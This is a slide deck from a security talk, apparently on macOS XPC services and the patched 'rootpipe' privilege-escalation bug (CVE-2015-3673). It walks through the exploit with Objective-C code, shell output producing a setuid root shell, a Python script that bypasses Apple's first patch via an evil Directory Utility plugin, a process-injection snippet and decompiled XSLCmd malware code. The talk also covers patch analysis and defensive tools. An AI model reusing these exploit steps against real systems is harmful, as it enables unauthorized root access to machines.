 [stability] each XPC service has its own sandbox crashes in the XPC services don't affect the app
  • 7. used all over the place by Apple XPC IN OS X $!find!/System/Library/Frameworks!6name!*.xpc! AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.FaceTimeService.xpc1 AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.MapLauncher.xpc1 ...1 WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.32.xpc1 WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.64.xpc1 WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc1 
 $!find!/Applications!6name!*.xpc
 iPhoto.app/Contents/XPCServices/com.apple.PhotoApps.AVCHDConverter.xpc1 iPhoto.app/Contents/XPCServices/com.apple.photostreamOagent.VideoConversionService.xpc
 Xcode.app/Contents/Developer/Toolchains/.../XPCServices/SourceKitService.xpc1 Xcode.app/Contents/XPCServices/com.apple.dt.Xcode.Playground.xpc1 ... frameworks and apps that use XPC frameworks apps }
  • 8. moving 'risky' code out-of-proc XPC display (uiI) } an 'unzip' XPC service a 'download' XPC service separate procs. w/ permissions 'normal' app XPC'd app allow deny deny deny XPC download, unzip, & display
  • 9. the app, comms, & xpc service XPC COMPONENT RESPONSIBILITIES XPC'd app XPC serviceXPC comms make connection send requests (msgs) listen authenticate (optionally) handle requests
  • 10. add 'xpc service' target to your application ADDING AN XPC SERVICE creating an XPC service embedded in app
  • 11. how to listen for client connections XPC SERVICE LISTENER int!main(int!argc,!const!char!*argv[])!{! !!!!! //set!up!NSXPCListener!for!this!service! !NSXPCListener!*listener!=![NSXPCListener!serviceListener];! !//create/set!delegate! !listener.delegate!=![ServiceDelegate!new];! !!!!! //resuming!serviceListener!to!starts!service! ![listener!resume];! }! @implementation!ServiceDelegate! 
 //where!NSXPCListener!configures,!accepts,!&!resumes!incoming!NSXPCConnection! 6(BOOL)listener:(NSXPCListener!*)listener!shouldAcceptNewConnection:(NSXPCConnection!*)newConnection!{! !!!! //configure!the!connection,!by!setting!interface!that!the!exported!object!implements! !newConnection.exportedInterface!=![NSXPCInterface!interfaceWithProtocol:@protocol(imgXPCServiceProtocol)];! !!!!! !//set!the!object!that!the!connection!exports! !!newConnection.exportedObject!=![imgXPCService!new];! !!!!! !!//resume!connection! !![newConnection!resume];! !!!! //'YES'!means!connection!accepted! !!!!return!YES;! }! listening & accepting XPC connection(s) template code in main.m
  • 13. //make!connection! //!6>note:!'com.synack.imgXPCService'!is!name!of!service!! NSXPCConnection*!connectionToService!=!
 !![[NSXPCConnection!alloc]!initWithServiceName:@"com.synack.imgXPCService"];!!! //set!interface!(protocol)! connectionToService.remoteObjectInterface!=!! !![NSXPCInterface!interfaceWithProtocol:@protocol(imgXPCServiceProtocol)];! //resume! [connectionToService!resume]; look up by name, set interface, and go! CONNECTING/USING THE XPC SERVICE XPC'd app //invoke!remote!method! [[connectionToService!remoteObjectProxy]!downloadImage:@"http://synack.com/logo.png"!! !!!withReply:^(NSData*!imgData)!! {! !!!!!!!!//got!downloaded!image! !!!!!!!NSLog(@"got!downloaded!image!(size:!%#lx)",!imgData.length);! }]; connect to xpc service invoke 'remote' method XPC system will find service by name
  • 15. from past to present... A 'ROOTPIPE' TIMELINE 10/2014 4/2015 discovery by Emil 8/2014 XSLCMD malware OS X 10.10.3 'patched' 4/20152001 OS X 10.0? phoenix exploit on 10.10.3 6/2015 OS X 10.10.4 patched
  • 16. creating a file THE HEART OF THE VULNERABILITY //get!default!file!manager! NSFileManager*!filemgr!=![NSFileManager!defaultManager];
 //create!file!w/!contents
 [filemgr!createFileAtPath:<path>!contents:<contents>!attributes:<attributes>]; 'source' code async!block!invoked!from!within! 6[WriteConfigDispatch!createFileWithContents:path:attributes:_withAuthorization:]! 
 mov!!!!!rdx,![rbx+20h]!!;!file!path! mov!!!!!rcx,![rbx+28h]!!;!file!contents! mov!!!!!r8,![rbx+30h]!!!;!file!attributes! mov!!!!!rsi,!cs:selRef_createFileAtPath_contents_attributes_!;!method! mov!!!!!rdi,!r14!!!!!!!!;!file!manager! call!!!!cs:_objc_msgSend_ptr disassembly 'writeconfig' XPC service problem?
  • 17. create any file, anywhere as root! THE HEART OF THE VULNERABILITY $!ps!aux!|!grep!!writeconfig!
 !root!!!/System/Library/PrivateFrameworks/SystemAdministration.framework/XPCServices/writeconfig.xpc!!!!! 'writeconfig' runs as r00t //create!file!w/!contents
 [filemgr!createFileAtPath:<path>!contents:<contents>!attributes:<attributes>]; } the file path, contents, & permissions are fully controllable - allowing an unprivileged attacker to create files (as r00t), anywhere on the system! + =+ path contents permissions root!
  • 18. an overview example EXPLOITATION writeconfig XPC service attacker's file (myShell) $!ls!6lart!/myShell! 6rwsrwxrwx!!1!root!!wheel!!/myShell! $!/myShell! #!whoami! root SystemAdministration framework {/bin/ksh, 04777, /myShell} XPC request
  • 19. asdasdf STEP 1] GET INSTANCE OF 'WRITECONIGCLIENT' ___33__WriteConfigClient_sharedClient__block_invoke!proc!near! ...! mov!!!!!rdi,!cs:classRef_WriteConfigClient! mov!!!!!rsi,!cs:selRef_alloc! mov!!!!!rbx,!cs:_objc_msgSend_ptr! call!!!!rbx!;!_objc_msgSend! mov!!!!!rsi,!cs:selRef_init! mov!!!!!rdi,!rax! call!!!!rbx!;!_objc_msgSend +[WriteConfigClient sharedClient] disassembly link against SystemAdministration framework //get!class! Class!WriteConfigClient!=!NSClassFromString(@"WriteConfigClient");! //get!instance!
 id!sharedClient!=![WriteConfigClient!performSelector:@selector(sharedClient)]; SystemAdministration framework
  • 20. authenticate against the remote xpc service STEP 2] AUTHENTICATE... ;6[WriteConfigClient!authenticateUsingAuthorization:]! ...
 mov!!!!!rdi,!cs:classRef_NSXPCConnection! mov!!!!!rsi,!cs:selRef_alloc! call!!!!cs:_objc_msgSend_ptr! mov!!!!!rsi,!cs:selRef_initWithServiceName! lea!!!!!rdx,!cfstr_Com_apple_sy_1! mov!!!!!rdi,!rax! call!!!!cs:_objc_msgSend_ptr //authenticate! [sharedClient!performSelector:@selector(authenticateUsingAuthorizationSync:)!withObject:nil]; ;6[WriteConfigClient!authenticateUsingAuthorization:]! mov!!!!!rbx,![r15+r14]! mov!!!!!rdi,!cs:classRef_NSXPCInterface! mov!!!!!rdx,!cs:protocolRef_XPCWriteConfigProtocol! mov!!!!!rsi,!cs:selRef_interfaceWithProtocol_! call!!!!cs:_objc_msgSend_ptr! mov!!!!!rsi,!cs:selRef_setRemoteObjectInterface_! mov!!!!!rdi,!rbx! mov!!!!!rdx,!rax! call!!!!cs:_objc_msgSend_ptr! mov!!!!!rsi,!cs:selRef_resume! call!!!!cs:_objc_msgSend_ptr inits XPC connection to 'com.apple.systemadministration.writeconfig' XPC request
  • 21. get access to the message dispatcher STEP 3] GET 'DISPATCH' OBJECT //get!remote!proxy!object! id!dispatchObj!=![sharedClient!performSelector:@selector(remoteProxy)]; #!lldb!r00tPipe! ....! b!6[WriteConfigClient!remoteProxy]! Breakpoint!1:!where!=!SystemAdministration`6[WriteConfigClient!remoteProxy]! thread!return! po!$rax! <WriteConfigOnewayMessageDispatcher:!0x60000000bb10>! WriteConfigOnewayMessageDispatcher
  • 22. ask the remote xpc service to kindly create us a file STEP 4] INVOKE 'REMOTE' METHOD //invoke!remote!object! [dispatchObj!createFileWithContents:CONTENTS!path:PATH!attributes:ATTRIBUTES]; forwardInvocation: selector += '_withAuthorization:' WriteConfigClient (sharedClient) remoteObjectProxy _NSXPCDistantObject invokeWithTarget: <NSInvocation:!0x60000046e240>! return!value:!{Vv}!void! target:!{@}!0x60000000c3c0! selector:!{:}! createFileWithContents:path:attributes:_withAuthorization:! argument!2:!{@}!0x6000000511c0! argument!3:!{@}!0x600000083ed0! argument!4:!{@}!0x6000000743c0! argument!5:!{@}!0x0 WriteConfig XPC service attacker's payload
  • 23. 'pls create me a root shell' COMBINED EXPLOIT $!./rootPipe!! step!0x1:!got!instance!<WriteConfigClient:!0x7f824141e670>! step!0x2:!authenticated!against!XPC!service! step!0x3:!got!instance!<WriteConfigOnewayMessageDispatcher:!0x7f8241433610>! step!0x4:!invoking!remote!XPC!method!to!create!/myShell!with!setuid!flag! $!/myShell!! #!whoami! root #!fs_usage!6f!filesystem! <rootPipe>! open!!!!!!!!!!!!!!F=4!!!!(R_____)!!/bin/ksh! read!!!!!!!!!!!!!!F=4!!!!B=0x154780! <writeconfig>! open!!!!!!!!!!!!!!F=4!!!!(RWC__E)!!/.dat014a.00b! write!!!!!!!!!!!!!F=4!!!!B=0x154780! rename!!!!!!!!!!!!!!!!!!!!!!!!!!!!!/.dat014a.00b! chmod!!!!!!!!!!!!!<rwsrwxrwx>!!!!!!/myShell!!!!!! chown!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!/myShell!!
  • 24. create file .... NOTE ON OLDER VERSIONS //use!'Authenticator'!class! id!authenticator!=![Authenticator!performSelector:@selector(sharedAuthenticator)];! //authenticate!with!non6NULL!auth!object! [authenticator!performSelector:@selector(authenticateUsingAuthorizationSync:)!withObject:auth]; //use!'ToolLiaison'!class! id!sharedLiaison!=![ToolLiaison!performSelector:@selector(sharedToolLiaison)];! //get!'tool'!object! id!tool!=![sharedLiaison!performSelector:@selector(tool)];! //get!'tool'!object! [tool!createFileWithContents:!...] authentication requires and auth object file creation via ToolLiaison class //or!directly!via!via!'UserUtilities'!! [UserUtilities!createFileWithContents:!...]; will fail for non-Admins file creation via UserUtilities class }either
  • 25. CHINA ALREADY KNEW malware with an 0day!? "somebody"
  • 26. provides reverse shell, screen capture & keylogging OSX/XSLCMD Forced to Adapt: XSLCmd Backdoor Now on OS X
 
 “a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems” -fireeye.com (9/2014) reverse shell screen capture keylogging no mention of any priv-esc exploit(s)
  • 27. did the malware exploit rootpipe as an 0day!? OSX/XSLCMD & ROOTPIPE tweet: 4/2015 why no mention in FireEye's report!? OSX/XSLCmd
  • 28. enabling access for 'assistive devices' to enable keylogging! MALWARE EXPLOITED ROOTPIPE (OS X 10.7/10.8) void!sub_10000c007()! r12!=![Authenticator!sharedAuthenticator];! rax!=![SFAuthorization!authorization];! rbx!=!rax;! rax!=![rax!obtainWithRight:"system.preferences"!flags:0x3!error:0x0];! if!(rax!!=!0x0)!{! !!![r12!authenticateUsingAuthorizationSync:rbx];! !!!rax!=![r12!isAuthenticated];! !!!if!(rax!!=!0x0)!{! !!!!!!rbx!=![NSDictionary!dictionaryWithObject:@(0x124)!forKey:*_NSFilePosixPermissions];! !!!!!!rax!=![NSData!dataWithBytes:"a"!length:0x1];! !!!!!!rax!=![UserUtilities!createFileWithContents:rax!path:@"/var/db/.AccessibilityAPIEnabled"!attributes:rbx];! !!!!!!!!!!!!!!!!!!!!!!!!!!! download sample: objective-see.com keylogging a .AccessibilityAPIEnabled =
  • 30. upgrade or 'die' FAIL #1: NO PATCH < OS X 10.10 “Apple indicated that this issue required a substantial amount of changes on their side, and that they will not back port the fix to 10.9.x and older” -Emil 'patched' OS X Yosemite (v. 10.10.3) no (official) patch for OS X Mavericks & older = "How to fix rootpipe in Mavericks" @osxreverser
  • 31. TL;DR: (attempt) to only allow authorized clients THE PATCH XPC comms writeconfig XPC service access check on clients unauthorized (non-apple) 'clients' can no longer connect to the remote writeconfig XPC service
  • 32. only allow authorized clients to connect THE OS X 10.10.3 PATCH “The new (patched) version implements a new private entitlement called com.apple.private.admin.writeconfig. 
 If the binary calling the XPC service does not contain this entitlement then 
 it can’t connect anymore to the XPC.” @osxreverser NSXPCListenerDelegate allow's XPC server to allow/deny connection
  • 33. decompilation of listener:shouldAcceptNewConnection PATCH DETAILS 6[WriteConfigDispatch!listener:shouldAcceptNewConnection:]! (NSXPCListener!*listener,!NSXPCConnection*!newConnection)! //get!audit!token! rbx!=!SecTaskCreateWithAuditToken(0x0,!listener);! //try!grab!"com.apple.private.admin.writeconfig"!entitlement! r13!=!SecTaskCopyValueForEntitlement(rbx,!@"com.apple.private.admin.writeconfig",!0x0);! //missing!entitlement?! if!(r13!==!0x0)!goto!error;! //!6>error!out,!disallowing!connection! error:! !!NSLog(@"###!Access!denied!for!unentitled!client!%@",!rbx); (new) entitlement checks } entitlements confer specific capabilities or security permissions embedded in the code signature, as an entitlement blob
  • 34. the XPC service is still there FAIL #2: PATCH IS MERELY A ROAD BLOCK video
  • 36. successfully (re)connect to the protected XPC service THE GOAL authentication is 100% dependent on entitlements, can we simply coerce a legitimate (entitled) binary to execute untrusted code? } infection? injection? hijacking? (evil) plugins? connect = win!
  • 37. scan entire file system for com.apple.private.admin.writeconfig FIND 'ENTITLED' BINARIES #recursively!walk!(starting!at!r00t)! for!root,!dirnames,!filenames!in!os.walk('/'):! #check!all!files! !for!filename!in!filenames:! 
 !!!!#check!for!entitlements! !!!!output!=!subprocess.check_output(!! !!!!['codesign',!'6d',!'66entitlements',!'6',!os.path.join(root,!filename)])! !!!!#check!for!entitlement!key! !!!!if!'<key>com.apple.private.admin.writeconfig</key>'!in!output:! !!!#found!!:)! !!!!!!!! #!python!findEntitled.py! /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder! /System/Library/CoreServices/Setup!Assistant.app/Contents/MacOS/Setup!Assistant!!!!!!!!!!!!!!!!!!!!!!!!!! /System/Library/CoreServices/Applications/Directory!Utility.app/Contents/MacOS/Directory!Utility! ... entitled binaries
  • 38. can a entitled binary be infected/patched? INFECTION Process:!!!!!!!!!Directory!Utility![1337]! Path:!!!!!!!!!!!!Directory!Utility.app/Contents/MacOS/Directory!Utility! Exception!Type:!!EXC_CRASH!(Code!Signature!Invalid)! Exception!Codes:!0x0000000000000000,!0x0000000000000000 nope: loader verifies all digital signatures! killed by the loader load-time binary verification
  • 39. can DYLD_INSERT_LIBRARIES be (ab)used? LOAD-TIME INJECTION $!DYLD_INSERT_LIBRARIES=rootPipe.dylib!Directory!Utility.app/Contents/MacOS/Directory!Utility //for!restricted!binaries,!delete!all!DYLD_*!and!LD_LIBRARY_PATH!environment!variables! static!void!pruneEnvironmentVariables(const!char*!envp[],!const!char***!applep)! {! !!!int!removedCount!=!0;! !!!const!char**!d!=!envp;! !!!for(const!char**!s!=!envp;!*s!!=!NULL;!s++)!{! ! !!!!if(strncmp(*s,!"DYLD_",!5)!!=!0)!! ! ! *d++!=!*s;!!! ! !!!!else!! ! ! !++removedCount;!!! ! !}!! ! !! !!!if!(removedCount!!=!0){! ! !!!!!dyld::log("dyld:!DYLD_!environment!variables!being!ignored!because!");!! ! !!!!!switch!(sRestrictedReason)!{!! ! !! !!!!!case!restrictedByEntitlements:!! ! !! ! !!!!!!!dyld::log("main!executable!(%s)!is!code!signed!with!entitlementsn",!sExecPath);!! nope: loader ignores DYLD_ env. vars for entitled binaries Mach-O loader & DYLD_ environment vars
  • 40. can dylib hijacking be (ab)used? DYLIB HIJACKING nope: no vulnerable apps are entitled white paper
 www.virusbtn.com/dylib 'hijackable' apps
  • 41. can code be injected into a entitled process? RUN-TIME INJECTION //shellcode!(here:!x86_64)! char!shellCode[]!=! !!!!!"x55"!!!!!!!!!!!!!!!!!!!!!!!!!!!//!pushq!!%rbp! !!!!!"x48x89xe5"!!!!!!!!!!!!!!!!!!!//!movq!!!%rsp,!%rbp! !!!!....
 //1:!get!task!for!pid! task_for_pid(mach_task_self(),!pid,!&remoteTask);
 
 //2:!alloc!remote!stack/code
 mach_vm_allocate(remoteTask,!&remoteStack64,!STACK_SIZE,!VM_FLAGS_ANYWHERE);
 mach_vm_allocate(remoteTask,!&remoteCode64,!sizeof(shellCode),!VM_FLAGS_ANYWHERE!);
 
 //3:!copy!code!into!remote!proc
 mach_vm_write(remoteTask,!remoteCode64,!(vm_address_t)shellCode,!sizeof(shellCode));
 
 //4:!make!remote!code!executable
 vm_protect(remoteTask,!remoteCode64,!sizeof(shellCode),!FALSE,!VM_PROT_READ!|!VM_PROT_EXECUTE);
 //5:!init!&!start!remote!thread
 remoteThreadState64.__rip!=!(u_int64_t)!(vm_address_t)!remoteCode64;! remoteThreadState64.__rsp!=!(u_int64_t)!remoteStack64;! remoteThreadState64.__rbp!=!(u_int64_t)!remoteStack64;
 
 thread_create_running(remoteTask,!x86_THREAD_STATE64,!(thread_state_t)&remoteThreadState64,!!!! !!!!!!!!!!!!!!!!!!!!!!x86_THREAD_STATE64_COUNT,!&remoteThread); nope: task_for_pid() requires r00t run-time process injection
  • 42. can (app-specific) plugins be (ab)used? EVIL PLUGINS maybe!? Directory Utility appears to support plugins #!codesign!6d!66entitlements!6!/System/Library/CoreServices/Applications/Directory!Utility.app/ Contents/MacOS/Directory!Utility!! <?xml!version="1.0"!encoding="UTF68"?>! <!DOCTYPE!plist!PUBLIC!"6//Apple//DTD!PLIST!1.0//EN"!"http://www.apple.com/DTDs/ PropertyList61.0.dtd">! <plist!version="1.0">! <dict>! ! <key>com.apple.private.admin.writeconfig</key>! ! <true/>! </dict>! </plist> Directory Utility Plugins
  • 43. can app-specific plugin loading be abused? EVIL PLUGINS #!fs_usage!6w!6f!filesystem! !! open!!!(R_____)!!/System/Library/CoreServices/Applications/Directory!Utility.app/Contents/PlugIns/ NIS.daplug/Contents/MacOS/NIS!! open!!!(R_____)!!/System/Library/CoreServices/Applications/Directory!Utility.app/Contents/PlugIns/ LDAPv3.daplug/Contents/MacOS/LDAPv3!! open!!!(R_____)!!/System/Library/CoreServices/Applications/Directory!Utility.app/Contents/PlugIns/ Active!Directory.daplug/Contents/MacOS/Active!Directory! ... void!6[PluginController!loadPlugins]!! {! !!!!rax!=![NSBundle!mainBundle];! !!!!rax!=![rax!builtInPlugInsPath];! !!!![self!loadPluginsInDirectory:rax];! !!!!return;! }! install evil plugin? Directory Utility loads plugins
  • 44. simply copy in a plugin to 'install' & get loaded INSTALL THE PLUGIN (AS ROOT) plugin installed auth prompt :( but...plugin does get loaded
  • 45. simply copy in a plugin to install & get loaded INSTALL THE PLUGIN The entitled 'Directory Utility' app will load (unsigned) plugins, which then can authenticate with the WriteConfig XPC service! but don't you need root to install plugin? owned by root :( ...but we can change that! #gameover
  • 46. rootpipe reborn on OS X 10.10.3 PHOENIX, IN 1, 2, 3 copy Directory Utility to /tmp to gain write permissions copy plugin (.daplugin) into Directory Utility's internal plugin directory execute Directory Utility XPC request evil plugin attacker's payload authenticates WriteConfig XPC service Dir. Utility $!ls!6lart!/private/tmp! drwxr6xr6x!!patrick!!wheel!Directory!Utility.app
  • 47. #trigger!rootpipe!on!OS!X!10.10.3! def!phoenix():! !!#copy!directory!utility.app!to!/tmp! !!#!6>this!folder!is!(obv)!accessible!to!all! !!shutil.copytree(DIR_UTIL,!destination)! !!#copy!evil!plugin!into!app's!internal!plugin!directory! !!#!6>since!app!is!in!/tmp,!this!will!now!succeed! !!shutil.copytree('%s'!%!(ROOTPIPE_PLUGIN),!'%s/%s/%s'!%!(destination,!DIR_UTIL_PLUGINS,!ROOTPIPE_PLUGIN))! !!#exec!Directory!Utility.app! !!#!6>will!trigger!load!of!our!unsigned!bundle!(Phoenix.daplug)! !!#!!!the!bundle!auth's!with!'WriteConfigClient'!XPC!&!invokes!createFileWithContents:path:attributes:! !!#!!!since!Directory!Utility.app!contains!the!'com.apple.private.admin.writeconfig'!entitlement,!we're!set!;)! !!os.system('open!"%s"!&'!%!destination)! !!!!!!!! if only all priv-esc bugs where this easy! PHOENIX.PY phoenix python script CVE-2015-3673 patched in OS X 10.10.4
  • 48. ....m0ar checks APPLE'S FIX; TAKE TWO OS X 10.10 OS X 10.10.3 OS X 10.10.46[WriteConfigDispatch!listener:shouldAcceptNewConnection:]
  • 49. improved authentication & location checks APPLE FIX (CVE-2015-3673) OS X 10.10.4 new entitlements com.apple.private.admin.writeconfig.voiceover location checks binary in /System "The problem of their fix is that there are at least some 50+ binarie [sic] using it. A single exploit in one of them and the system is owned again because there is no fundamental fix inside writeconfig" @osxreverser } com.apple.private.admin.writeconfig.enable-sharing binary in /usr }
  • 50. OS X DEFENSE keeping your mac secure
  • 51. OBJECTIVE-SEE free OS X tools & malware samples malware samples :) KnockKnock BlockBlockTaskExplorer
  • 52. KNOCKKNOCK UI detecting persistence: now an app for that! KnockKnock (UI)
  • 53. KNOCKKNOCK UI VirusTotal integration detect submit rescan results VirusTotal integrations
  • 54. BLOCKBLOCK continual runtime protection status bar BlockBlock, block blocking :)
  • 56. CONCLUSIONS …wrapping this up OS X security, is often quite lame! XPC interfaces malware patches } audit all thingz!
  • 57. QUESTIONS & ANSWERS patrick@synack.com @patrickwardle feel free to contact me any time! "What if every country has ninjas, but we only know about the Japanese ones because they’re rubbish?" -DJ-2000, reddit.com final thought ;)
  • 58. credits - thezooom.com - deviantart.com (FreshFarhan) - http://th07.deviantart.net/fs70/PRE/f/2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg 
 - iconmonstr.com - flaticon.com //XPC http://www.objc.io/issues/14-mac/xpc/ images